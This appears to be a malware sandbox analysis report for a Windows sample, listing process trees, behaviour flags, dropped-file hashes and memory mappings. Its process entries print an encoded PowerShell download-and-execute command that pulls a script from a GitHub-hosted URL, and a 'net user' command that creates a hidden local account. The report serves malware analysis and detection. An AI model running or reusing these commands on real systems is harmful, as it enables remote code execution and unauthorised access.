C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Get-Content.PS1MD5
4d0cb7fa714bb6b8b113319c5f37734d
SHA178fb1052d8fa35592e0f6103378658478c8d1385
SHA256469199f341db97de914a24f626d2f1ea8fe116bd6302bb10e53a027e759e7845
SHA512b2e7d6f724990ea57448429f159c713b2885354c709e206a97126b470e9705143e2695a3bd73ee3f55a160f2807f4ac215dca9df0da209bf88503069d52cd76c
-
C:\Users\Admin\AppData\Local\Temp\RESB319.tmpMD5
479172f990cd623d3039cf4d281867fa
SHA18d1a8bd0ec3389f663aa89184286e6c099adb21f
SHA2567f9eaf1ba360cc7526b91c598740499761fc75c6da22a95c05a267cae2cfcf73
SHA5127222286fb518bdec6a610ebdbfea8aca61e4bd73200366cb191a1412d911ad63ee8cd984f79a45e24dd61a00cbe0bf03c51abcde1195497f7a7ecc4388bd81ce
-
C:\Users\Admin\AppData\Local\Temp\hg0g4ial\hg0g4ial.dllMD5
bea184123b42dae1852d9ddf33aad37f
SHA12412b02e0361f4d643f6ccd8df61638b1f2804f7
SHA25629a7ba6f2f6e51911364cd34d33c66de459e52f863e0a908b24d640a9628ea28
SHA5122d1ccb553236f2be98fdb4fa2d2f3ad018bfbf6a297a9f8fa42c59a6a6dd82f6521653c9555e162f39fb9e504409420c5dcddbe32bfe858dd25089416d0b21f5
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
065cc96fec70546c9f195f703e4d657b
SHA19da24636d8fd3de61f46ff7282640d3fa27d6b45
SHA256cc7097fa515dfc07033464b5e71ba0172f440bd4043ec1c7c48c6ce4f18e3bc3
SHA512a2fefe055067d832736c109d1ea50921bfc9275bb6fe11e57f4245cac52e1758b9b2d7fe893ece0fe5101b3cb5a1229011b8e517fe31de5202c4a7f0fa39aec0
-
C:\Users\Admin\AppData\Local\Temp\vMHNc4UoUH.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
C:\Users\Admin\AppData\Local\Temp\vMHNc4UoUH.exeMD5
c2ac724339045f253306ae9ab38cbf4f
SHA1c6abd5edb40444ce3fbc8564051545161cd85495
SHA256d626090ca79fc0a3494f3f89148180beb850299ce7cae9f115753d5c04afbc6a
SHA512b7f0e175f0112a95536a50790c73796dda160cdeb58f6d09481e3515232a774c1da2a2eaed47e9dfe0287213e794e26553358c1c45c1a8177f50c3269f2fde58
-
\??\c:\Users\Admin\AppData\Local\Temp\hg0g4ial\CSC353E46E6869D4CB6818D7855FD34F31D.TMPMD5
9e201f77b325f9092e0acf6ae1643edb
SHA1a17f726c970bf72d4eb672fa27eb835fc8adb664
SHA256b55fc30a049220e9e2b0842a18d8e97c251b42a503ea5c996675d9b7ef4e8b8f
SHA512e70d7a9126911298245ab3c11c83a3f137fae34a6a6a8dc835671e25024a77979d507ed68bc3cedba6a3e40c2753e26ac3f81f46eb54fa327ff14e1372cf2b50
-
\??\c:\Users\Admin\AppData\Local\Temp\hg0g4ial\hg0g4ial.0.csMD5
df390bc8a088b51d27253fed32186361
SHA169e6a59300fc04ef5ab53cbe061b8b2aefe375a4
SHA2564388b3b4aaccededcd9a2d864ba85967c08a4586dee2745e5539e12cb4de5c5f
SHA5124d0d050afd8809b9090e0ac8ab4f00ad4237723bfa8adb2f605fbbdd6be532bd941bccf79b7fbc0d226bc7890c2011dd18b0263af5b81911e1c8def2d9f235c8
-
\??\c:\Users\Admin\AppData\Local\Temp\hg0g4ial\hg0g4ial.cmdlineMD5
5136de4a9bc1a365e9233c3894c54812
SHA1f08e879c9badaa42cf530b2ea1de1daaab652271
SHA256815b4895be6c41be3c4d34fefb0e31e3bd447d574085b4c2245dfaf0455115b2
SHA5121d39b59d2d02b4477a1b6e4789b0a163beb460c28f013a96f85e03b470eecb56190446ed10e848f396366031f8011ad0f77761b1b3030d637f40e0b02f049726
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dllMD5
60acd24430204ad2dc7f148b8cfe9bdc
SHA1989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA2569876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dllMD5
eae9273f8cdcf9321c6c37c244773139
SHA18378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA51206e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dllMD5
02cc7b8ee30056d5912de54f1bdfc219
SHA1a6923da95705fb81e368ae48f93d28522ef552fb
SHA2561989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA5120d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5
-
\Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dllMD5
4e8df049f3459fa94ab6ad387f3561ac
SHA106ed392bc29ad9d5fc05ee254c2625fd65925114
SHA25625a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA5123dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6
-
\Users\Admin\AppData\LocalLow\sqlite3.dllMD5
f964811b68f9f1487c2b41e1aef576ce
SHA1b423959793f14b1416bc3b7051bed58a1034025f
SHA25683bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4
-
\Windows\Branding\mediasrv.pngMD5
ee8186ae8d2615ee4a859007556227ec
SHA10125a0caaf2ff3da1266f1893cf051ddca6460fa
SHA25696de9d90945d198cd5aed4a446e464ba13e2e4e92d3649a396825864a0fcd17f
SHA5122eebacfc81b1c974583c41f44b7726e8280098d1f371db7d7038d24bdf3724093f1fe1c0c7eff5e8d9053cd98add7882734ea0746c8b20621e67e1b06442d612
-
\Windows\Branding\mediasvc.pngMD5
7a8bf878d6438e28822cb499cb7da107
SHA136cbc7c1b2da094b773614d251704e4c2bb0e88e
SHA2569aae34a03f16047b5e795b0dcd9b717f87c54355a9928889f629f3bb06bd7e63
SHA5126c19a44f8c4251cd14c35862108a4fed4875386a5eec9763ce78679beedc0bd157560eb5a3b11209a5b4336b923133a6bf9f8f657f116744077967d6af6654ee
-
memory/184-241-0x0000000000000000-mapping.dmp
-
memory/192-248-0x0000000000000000-mapping.dmp
-
memory/196-182-0x0000026FEC913000-0x0000026FEC915000-memory.dmpFilesize
8KB
-
memory/196-181-0x0000026FEC910000-0x0000026FEC912000-memory.dmpFilesize
8KB
-
memory/196-172-0x0000000000000000-mapping.dmp
-
memory/196-212-0x0000026FEC918000-0x0000026FEC91A000-memory.dmpFilesize
8KB
-
memory/196-185-0x0000026FEC916000-0x0000026FEC918000-memory.dmpFilesize
8KB
-
memory/200-229-0x0000000000000000-mapping.dmp
-
memory/696-224-0x0000000000000000-mapping.dmp
-
memory/696-246-0x0000000000000000-mapping.dmp
-
memory/760-237-0x0000000000000000-mapping.dmp
-
memory/1152-243-0x0000000000000000-mapping.dmp
-
memory/1280-215-0x000001B9A6B03000-0x000001B9A6B05000-memory.dmpFilesize
8KB
-
memory/1280-214-0x000001B9A6B00000-0x000001B9A6B02000-memory.dmpFilesize
8KB
-
memory/1280-213-0x0000000000000000-mapping.dmp
-
memory/1280-217-0x000001B9A6B06000-0x000001B9A6B08000-memory.dmpFilesize
8KB
-
memory/1316-122-0x0000000000000000-mapping.dmp
-
memory/1316-127-0x000002A3FD840000-0x000002A3FDC61000-memory.dmpFilesize
4.1MB
-
memory/1316-129-0x000002A3FD400000-0x000002A3FD402000-memory.dmpFilesize
8KB
-
memory/1316-130-0x000002A3FD403000-0x000002A3FD405000-memory.dmpFilesize
8KB
-
memory/1316-131-0x000002A3FD405000-0x000002A3FD406000-memory.dmpFilesize
4KB
-
memory/1316-132-0x000002A3FD406000-0x000002A3FD407000-memory.dmpFilesize
4KB
-
memory/1484-239-0x0000000000000000-mapping.dmp
-
memory/1484-257-0x0000000000000000-mapping.dmp
-
memory/1536-226-0x0000000000000000-mapping.dmp
-
memory/1592-260-0x0000000000000000-mapping.dmp
-
memory/1812-251-0x0000000000000000-mapping.dmp
-
memory/1812-228-0x0000000000000000-mapping.dmp
-
memory/1876-238-0x0000000000000000-mapping.dmp
-
memory/1916-247-0x0000000000000000-mapping.dmp
-
memory/1988-249-0x0000000000000000-mapping.dmp
-
memory/2112-126-0x0000000000000000-mapping.dmp
-
memory/2116-245-0x0000000000000000-mapping.dmp
-
memory/2340-242-0x0000000000000000-mapping.dmp
-
memory/2652-250-0x0000000000000000-mapping.dmp
-
memory/3192-223-0x0000000000000000-mapping.dmp
-
memory/3236-232-0x0000000000000000-mapping.dmp
-
memory/3236-154-0x0000000000000000-mapping.dmp
-
memory/3284-258-0x0000000000000000-mapping.dmp
-
memory/3440-240-0x0000000000000000-mapping.dmp
-
memory/3524-230-0x0000000000000000-mapping.dmp
-
memory/3564-234-0x0000000000000000-mapping.dmp
-
memory/3620-254-0x000001507C973000-0x000001507C975000-memory.dmpFilesize
8KB
-
memory/3620-253-0x000001507C970000-0x000001507C972000-memory.dmpFilesize
8KB
-
memory/3620-252-0x0000000000000000-mapping.dmp
-
memory/3620-256-0x000001507C978000-0x000001507C979000-memory.dmpFilesize
4KB
-
memory/3620-222-0x0000000000000000-mapping.dmp
-
memory/3620-255-0x000001507C976000-0x000001507C978000-memory.dmpFilesize
8KB
-
memory/3628-125-0x0000000000000000-mapping.dmp
-
memory/3844-151-0x0000000000000000-mapping.dmp
-
memory/3892-220-0x0000025567146000-0x0000025567148000-memory.dmpFilesize
8KB
-
memory/3892-219-0x0000025567143000-0x0000025567145000-memory.dmpFilesize
8KB
-
memory/3892-218-0x0000025567140000-0x0000025567142000-memory.dmpFilesize
8KB
-
memory/3892-216-0x0000000000000000-mapping.dmp
-
memory/3904-225-0x0000000000000000-mapping.dmp
-
memory/3956-139-0x00000186259C0000-0x00000186259C2000-memory.dmpFilesize
8KB
-
memory/3956-221-0x00000186259C8000-0x00000186259C9000-memory.dmpFilesize
4KB
-
memory/3956-133-0x0000000000000000-mapping.dmp
-
memory/3956-164-0x000001863FE10000-0x000001863FE11000-memory.dmpFilesize
4KB
-
memory/3956-158-0x000001863F870000-0x000001863F871000-memory.dmpFilesize
4KB
-
memory/3956-138-0x000001863F720000-0x000001863F721000-memory.dmpFilesize
4KB
-
memory/3956-165-0x00000186401A0000-0x00000186401A1000-memory.dmpFilesize
4KB
-
memory/3956-140-0x00000186259C3000-0x00000186259C5000-memory.dmpFilesize
8KB
-
memory/3956-150-0x00000186259C6000-0x00000186259C8000-memory.dmpFilesize
8KB
-
memory/3956-143-0x000001863F8D0000-0x000001863F8D1000-memory.dmpFilesize
4KB
-
memory/4004-233-0x0000000000000000-mapping.dmp
-
memory/4024-227-0x0000000000000000-mapping.dmp
-
memory/4064-231-0x0000000000000000-mapping.dmp
-
memory/4064-259-0x0000000000000000-mapping.dmp
-
memory/4068-244-0x0000000000000000-mapping.dmp
-
memory/4068-115-0x0000000000400000-0x0000000000496000-memory.dmpFilesize
600KB
-
memory/4068-114-0x00000000020F0000-0x0000000002181000-memory.dmpFilesize
580KB